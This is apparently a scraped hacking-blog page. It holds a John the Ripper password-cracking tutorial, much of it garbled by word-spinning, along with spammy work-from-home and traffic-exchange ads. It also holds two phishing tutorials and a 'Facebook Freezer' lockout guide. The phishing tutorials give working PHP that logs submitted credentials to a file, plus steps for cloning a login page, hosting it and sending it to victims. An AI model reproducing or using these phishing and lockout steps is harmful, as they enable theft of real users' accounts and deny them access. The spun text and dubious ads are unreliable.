Design your theme

John the Ripper is probably the fastest, most versatile, and definitely one of the most popular password crackers available. It supports six different password hashing schemes that cover various flavors of Unix and the Windows LANMan hashes also known as NTLM ( used by NT, 2000, and XP ). It can use specialized wordlists or password rules based on character type and placement.

I got profuse Emails from my blog readers requesting me to record an article on how to use john the ripper, But in truth qualified are may hunky-dory tuts on the snare on this subject. Inasmuch as i taught instead of writing i can share one comparable article The following article is written by Renegade

image

John The Ripper Tutorial

I wrote this tutorial as crowing I could to shot to disclose to the newbie how to operate JTR. Master, this is a newbie tutorial, ergo I wont go into detail keep secret all of the individualism. JTR is a program that decrypts Unix passwords using DES ( Data Encryption Standard ).

The Process

Step 1: Download John The Ripper By Hackerstips.tk

Download_button

Step 2: Extract JTR. Command windows use winzip. Prominence unix type macadamize - xzf john - 1. 6. concrete. gz

 

Step 3: Significance windows ajar the command prompt. Birr to the Origin chuck, drift Tear, type ' command ' ( no quotes ) and press enter.

You obscure me? Satisfactory. Snap to whatever directory to keep JTR force. Type ' john ' and press enter. A full guide of options will come up:

John the Ripper Adventure 1. 6 Copyright ( c ) 1996 - 98 by Solar Designer
 



Usage: / WINDOWS / DESKTOP / JTR / JOHN - 16 / Dart / john [OPTIONS]

[PASSWORD - FILES]
- single " single crack " mode
- wordfile: FILE - stdin wordlist mode, scan words from FILE or stdin
- rules enable rules for wordlist mode
- incremental[: MODE] incremental mode [using section MODE]
- out: MODE independent mode or consultation filter
- stdout[: LENGTH] no cracking, rigid note words to stdout
- restore[: FILE] restore an interrupted talk [from FILE]
- confrontation: FILE set gig file eponym to FILE
- status[: FILE] chalk position of a concourse [from FILE]
- makechars: FILE originate a charset, FILE will imitate overwritten
- shine program cracked passwords
- investigation perform a benchmark
- users: [ - ]LOGIN | UID[,.. ] load this ( these ) user ( s ) onliest
- groups: [ - ]GID[,.. ] load users of this ( these ) parcel ( s ) isolated
- shells: [ - ]SHELL[,.. ] load users camouflage this ( these ) shell ( s ) isolated
- salts: [ - ]COUNT load salts veil at headmost COUNT passwords unrivaled
- format: Moniker beef ciphertext format Place name
( DES / BSDI / MD5 / BF / AFS / LM )
- savemem: Unfluctuating enable retentiveness saving, at In line 1.. 3



 You wont use most of these options. Effect fact, you don ' t absolutely demand department of these options. You can cleverly type ' john [filename] '. The filename commitment include the. txt extension. This is the regular crack. It will use bruteforce to decrypt all of the passwords in the file. If you ' re an impatient ass you can use a word list. This is not as effective but it ' s quicker ( more on that later ).

How to make a crackable file: Let ' s say that for some reason you have a DES encrypted password but no file. If you want to crack it ( why else would you be here? ) you need to make your own file. Just create a text file and paste in the password. Now put a username ( just any old name will do ) in front of it with a colon separating the two. It should look something like this:

User: gyuJo098KkLy9 

Save the file as crackme. txt ( just an example ) and go to the prompt and type ' john crackme. txt ' ( no quotes obviously ). Now you just have to wait.


Options

Here are a list of the options and what they do.


single:

Single crack mode. This is only recommended for weak passwords as it includes only a few rules and a small wordlist.
Usage: john - single crackme. txt


wordfile:

Uses a wordlist ( basically a dictionary attack ). What this does is tries every word in the list until it finds a match or you reach the end of the list. This is quicker than the default ( bruteforce ) attack, but I don ' t recommend this because it doesn ' t always find a match. More notes on wordlists below.

 Usage: john - wordfile: password. lst crackme. txt


 rules:

Lets you define the rules for using wordlists. I don ' t use wordlists, so if you want to use this option I wont help you. Ok, ok, I ' m just lazy. Shoot me.


 incremental:

I like this method. It allows you to do a brute force attack
under certain modes.
Usage: john - incremental: alpha crackme. txt ( only letters )
john - incremental: digits crackme. txt ( only numbers )
john - incremental: lanman crackme. txt ( letters, numbers, and some special characters )
john - incremental: all crackme. txt ( all characters )

 

external:

This is a little complicated, so if you are lame don ' t mess with it. Basically this calls the options that are defined in the configuration settings. You can change these yourself, but I wouldn ' t recommend it unless you know what you ' re doing. No, I wont tell you how, go away.
Usage: john - external: [MODE] crackme. txt ( replace MODE with whatever the
name of your mode is ).


restore:

Ok, let ' s say that you need to stop the crack in the middle. Press crtl + break. A file will be created in the JTR directory named ' restore ' ( no quotes doofus, and yes, no file extentionfilename.
 Usage: john - restore: restore


session:

Use this if you know that you will have to stop JTR in the middle of a crack. It allows you to create a new file that holds the data of your session. You can then restore your session later.
 Usage: john - session: [save to filename] crackme. txt


status:

Shows how far you got before stoping a crack ( provided you used the - session option ).
 Usage: john - status: [filename]


 show:

Shows how many passwords have been cracked in a file and how many are left.
 Usage: john - show crackme. txt


 

test:

Shows how fast JTR will work on your computer.
 Usage: john - test


users:

Cracks the password only for the user or users you tell it to.
 Usage: john - users: User crackme. txt


 groups:

Cracks the passwords only for the group or groups you tell it to.
 Usage: john - group: lamers crackme. txt


shells:

Cracks the passwords only for the shell or shells you tell it to.
Usage: john - shells: shelly crackme. txt


salts:

Cracks the salts that have at least the number of passwords you specify.
Usage: john - salts: 2 crackme. txt

format: JTR can decrypt many from many different formats, not just DES ( but this is the most widely used one ). Use this to force JTR to try a certain format.
Usage: john - format: DES crackme. txt ( force DES )
john - format: BSDI crackme. txt ( force BSDI )
john - format: MD5 crackme. txt ( force MD5 )
john - format: BF crackme. txt ( force BF )
john - format: AFS crackme. txt ( force AFS )
john - format: LM crackme. txt ( force LM )



 savemem:

this tells JTR to automatically save your process at whatever
level you specify from one to three.
Usage: john - savemem: 1 crackme. txt ( save at level 1 )
john - savemem: 2 crackme. txt ( save at level 2 )
john - savemem: 3 crackme. txt ( save at level 3 )

How to use a wordlist with JTR: I ' ll assume you already have a wordlist in the JTR directory ( it comes with password. lst, if you want to make your own I ' ll tell you how later ). Go to the prompt and type ' john - wordfile: password. lst crackme. txt ' ( no quotes, damnit ). If the password is in the wordlist, it will work. Otherwise, you deserve it for using a wordlist when you have bruteforce capabilities, shame on you.

How to create a wordlist to use with JTR: First I will include a few lines of the wordlist supplied with JTR:
#! comment: Common passwords, compiled by Solar Designer.
12345
abc123
password
password
123456

The top line is a comment ( duh ). If you want to make a comment in your wordlist just follow the example. The other lines are passwords that the program will try when you use the wordlist. Put each password on a new line. In the event that you are too lazy to write your own wordlist you can download one ( once again, I ' m far too lazy to give you a link ). It may or may not already be the right file format (. lst ). If it isn ' t, just go to the prompt. Assuming the filename is lazy. txt, type ' rename lazy. txt lazy. lst '

Piping Output: Remember the - show option? You can get JTR to save that
output to a file. Just type ' john - show crackme. txt > crackinfo. txt '



 There ' s my guide. I have an FAQ below:

Q: Can I mix options?
A: Yes, certain options can be mixed. You can mix options as long as they don ' t clash. Play around with it a while.

Q: What does " Loaded 0 passwords " mean?
A: There was a problem with either your password file or the syntax of your command. If you force BF decryption when your file has DES encryption it wont work. If your password file isn ' t made right it wont work.

Q: What does " Password files required, but none specified " mean?
A: Can you read? You can ' t just tell JTR to crack, you need to give it a file.

Q: What does " Unknown cypher text format name requested " mean?
A: When you use the - format option you need to check that you typed the name of the format correctly.

Q: How come when I typed ' john - users: login | uid crackme. txt ' ( which by the way is the usage shown in the list of option by JTR ) I received this error:
Option requires a parameter: " - users: "
Bad command or file name
A: The piping symbol you used ( | ) can mean two different things. In this case in means ' or '. You ' re supposed to use login OR uid. When you type it in a dos window, you are running two separate commands.

Q: Can I speed up the bruteforce?
A: Sure, just toss that old ass box of yours and get a new one.



,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Enjoy This Great Hacking Tutorial,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

image

Extraprofits

PART TIME DATA ENTRY POSITIONS AVAILABLE!

"Receive $2500-$8500 Weekly.
Do Simple Part Time Data Entry Jobs Online!
We Need To Appoint 250 People Worldwide Who Want To Earn $2500-$8500 Weekly By Doing Legitimate Part Time Online Data Entry Work For Us From Their Own Homes!"

Additionally, We Also Pay You A Generous Basic Salary Of $2000* Monthly 
(In Addition To Your Weekly Earnings Of $2500-$8500)

Earn Immediately By Typing Data Onto Online Forms

image

This Part Time Online Job Involves Simple Typing Of Online Forms For Us ...
... You Type, We Pay
Start Earning Immediately After You Join

If You Enroll For This Profitable, Legitimate Part Time Online Job Offer, Today (Sat 25th Jun,2011), We Will Instantly Credit Your Account With $100 As A Welcome Gift.

imageimage

"I just joined your program recently and I happily earn $8000 average monthly. The work is easy, exciting and takes very little of my time. As a student, this money will help me through college. I sincerely recommend this genuine opportunity to anyone out there who is looking to make good, regular income from home. Thank you for showing me the way!" 
Nitesh Singh
India

Want To Visit This Site

Netjobs4all
  • No Investment. No Joining Fees.
  • 100% Free to Join.
  • Easy Data entry Form Filling Jobs.
  • Home based Part time Online Jobs.

Work at home, Online jobs, Part time jobs, home based jobs, internet jobs, Data Entry jobs


Dear Internet Friend

, Welcome.
Nice to meet you through this website. This website is exclusively designed for Indians who wants to earn money through Home based internet jobs without any investment, who can spend only few hours in a day. Trust us, you will earn Rs. 50000 and more from this month.


What is the actual work?


The actual jobs is filling online data entry forms in the internet. We will be providing you simple Online Registration Forms. You have to fill those Online Registration Forms according to the instructions.

Is it easy to fill those registration forms?
Yes. These are very simple data entry forms and it is similar to creating an Email account in yahoo, hotmail or rediff. It takes less than 2 minutes to fill those forms. This is similar to Data entry jobs.


How much I can earn for filling each forms?
You can earn between Rs.50 to Rs.100 for each data entry form you fill. We have many categories of forms to fill. Based on the category, the rate will vary. On an average, you can earn Rs.75 for each form you fill.


Is this work available worldwide?
No. This work is available only for Indians. In future, we will recruit peoples from all over the world. You just need basic internet browsing knowledge.


What is the Qualification to do this work?
No need Extra qualification. Just basic Internet Browsing knowledge is enough to do this job.


How much time I need to work in the Internet ?
There is no hard and fast rules regarding the work. It depends on the number of hours you work.You can work at your convenient timings. But it is good at least you work 1 hour daily to earn a decent income.


When will I get the payment and what is the mode of payment?
You will be paid on or around 20th of every month for the previous month earnings. You will be paid only if your earnings is equal to or more than Rs.2000. If it is less than Rs.2000 for a particular month, then the amount will be added to the next month earnings. We pay you by Check.

Visit This Site

Traffic swarm
Traffic Swarm is Targeted: You'll only get live, real-time targeted traffic. No forced page loads here. Real people choose to click on your ad.


Traffic Swarm is "Viral Marketing":
Traffic and visitors to your site will grow and spread exponentially the more you use the system.

Traffic Swarm is Proven: Over 400,000 successful members utilize the secret "TS Traffic Technology" to generate web traffic daily.

Traffic Swarm is Cheat-Proof: Chiselers and click-bots can't waste your credits like they do at other traffic exchanges. Our system ensures you get only real, live people visiting your site.

Traffic Swarm is Generous: Highly incentivized referral program means even more traffic for your site. Earn on your referrals FIVE levels deep. No cap or limit on referral rewards!

Free Traffic Generator

Step 1: Sign up and claim your Free Lifetime Membership today.
Step 2: Surf your Traffic Swarm Page and view only the sites that interest you.
Step 3: Place your ads inside your Traffic Swarm account. Then...
... sit back while you get free traffic to your site from interested Traffic Swarm members. It just couldn't be any easier!

You will use Traffic Swarm today ... right now ... to get live, targeted traffic to your site that will help you...

· Test your ads for free before rolling out to paid spots

· Get more exposure to increase your sites Alexa ranking

· More leads

· More sales

And it's all on a budget that anyone can afford and everybody likes ... FREE!
Find out for yourself why Traffic Swarm has been the undisputed traffic exchange leader for several years running.

Free Traffic Generator

There are people on Traffic Swarm right now who could be visiting your site ... for FREE.
Don't miss out on another day of traffic that's going to your competitor's site instead of yours.
Complete the form to the right to register for
free and get started today.
To Your Success!

Want to Visit This Site

,,,,,,,,,,,,,,,,Enjoy Money Making,,,,,,,,,,,,,,,,,,,,,,


image

Here i want to show you how to make a phishing page using a Phishing Creator - Super Phisher and get account information for various websites from many people. Đ¢his is the easiest and also a very effectively way to make a phisher and hack any website account password.
Here are some features of Super Phisher:

  • Fastest phisher maker tool ever
  • Makes phisher for almost any site
  • Useful for users who don't knows HTML, PHP coding
  • No manual work except entering URL of website, for which u want to make phisher
  • Fully automated tool
  • Small in size.
  • Instant access to phishers you created.

Download_button
For example i will show you how to make a phishing site of Lockerz.com.
Here is a step by step guide to hack any website account password using phishing creator tool:
1. First of all Download Super Phisher

2. In "Super Phisher" folder, open "Super Phisher.exe" file to get something like:
3. Now, in "URL of Login Page", enter
http://www.lockerz.com. This is the site you want to hack.
4. In "Name of Log File" write password.txt or whatever you like. This is the place where all typed id and password are stored. In "Name of PHP File" also type anything you like, e.g. lockerz.php or login.php...
5. In field of "Site redirect to", enter
http://www.lockerz.com/myLocker, so that victim is redirected to original Locker site when he enters his email and password.
6. Click on "Build Phisher" and you will get Lockerz phisher created in "Output" folder in current directory.
7. Upload all of the phisher files to any free webhost site like:
RipWay or 000webhost.com
8. Once you have uploaded the files in the directory, send this phisher link to your victim and make him login to his Lockerz account using your sent Phisher.
9. Once he logs in to his Lockerz account using Phisher, all his typed email and password is stored in "password.txt".
10. Now you can see password in this .txt file and hack Lockerz account password.

                                                    Enjoy Phishing


I received many Emails from my blogger readers requesting me to make Fake / Phisher page for various websites like Orkut, twitter, Gmail, Face book... etc. I have already written some tutorials on how to hack Face book, Gmail using a fake / phishing page. But many had doubts, problems. To clear all there doubts i taught i can write a tutorial on how to make your own fake / phisher page for any website that you want So I Post This Tutorial (How To Hack From Making Phishing Page) And This Tutorial  Is 2nd Part Of That 


                         This is the easiest way to make phishing page Good luck
Follow the steps given below to create your own phishing page
How to Make a Phisher / Fake Page For Any Website
imageuebE731303814582
1. First open the website in a browser for which you want to create a phishing page. Now right click in an empty space and select view source, copy all the contents to a note pad and save it as something. html
example:
yahoo. html


2. Now open Yahoo. html ( something. html ) in a notepad. Now search for the string
" action = https.. " and change the address to login. php and save it

image

3. Now we have to create login. php. For this open notepad, copy / paste the following code in it and save it as login. php


<? php
header ( ' Location: http: / / hackerstips.blogspot. com ' );
$handle = fopen ( " log. txt ", " a " );
foreach ( $_POST as $variable => $value ) {
fwrite ( $handle, $variable );
fwrite ( $handle, " = " );
fwrite ( $handle, $value );
fwrite ( $handle, " \ r \ n " );
}
fwrite ( $handle, " \ r \ n " );
fclose ( $handle );
exit;
? >
Note: –Change hackerstips.blogspot.com with the redirected site url

By default the victim will be redirected to yahoo. com once he clicks login, If you want you can change the address you can do it by changing the www. yahoo. com to any address you desire

4. Now we have to create a empty log file for this Open a notepad and save the empty file as log. txt.
5. Now create an account in Free web hosting sites, which supports php like, T35. com or 000webhost. com
6. Now upload all the three files which we created Yahoo. html, login. php, log. txt and change the file permissions for log. txt to 777
7. Now send the Yahoo. html link to the victim, once he enters the information and logins in, every thing will be stored in log. txt, you can open log. txt to see all the login details

Hope you enjoyed this tutorial, If you have any doubts please feel free to post a comment
……………………………………………Hackerstips.tk…………………………………………………
……………………………………………….Enjoy Hacking………………………………………………...


I Have Written Many Post On How To Hack Facebook Password Via Phishing |Create Fake Login Page And Facebook Hacking Corner
                      …………………………………………………..But……………………………………………………………


Yesterday when i was surfing on the net i came across an interesting script kidy tool Facebook Freezer  Actually this tool is not used for hacking Facebook but it is simply used to prevent users from logging into Facebook sounds cool ?
Follow the instructions given below to prevent your friends , from logging into their Facebook account
image
Concept Behind The Hack: -
Facebook has a security attribute mastery which touching 25 or thence logins the bill is temporarily hobbling, to enable the report the report innkeeper must reset his / her account
Thus, even when victim tries to login his Facebook account using correct password, he is not able to login to his Facebook account, thus you can hack Facebook account thanks to Facebook Freezer.

Hack Facebook Accounts With Facebook Freezer :-


1. Frist a fall Download Facebook Freezer

Download_button
2. Now extract the files into a folder
3. Now run Facebook Freezer. exe file as shown
image
4. Now enter the email id of the victim whose Facebook account you want to hack using Facebook freezer and finally hit " Freeze ".

5. That ' s it. You will now be able to hack Facebook account using this Facebook freezer. This freezing will continue until you hit " Stop Freezing ". This will not hack Facebook account for you but it will prevent the victim from logging into his, her account,


Note: - If you want to hack Your friends Facebook Password Via phishing. You can have a look at my article How to hack Facebook account using A Phisher

      For further doubts and clarifications please pass your comments




Total Pageviews

Recent Comments

Recent Posts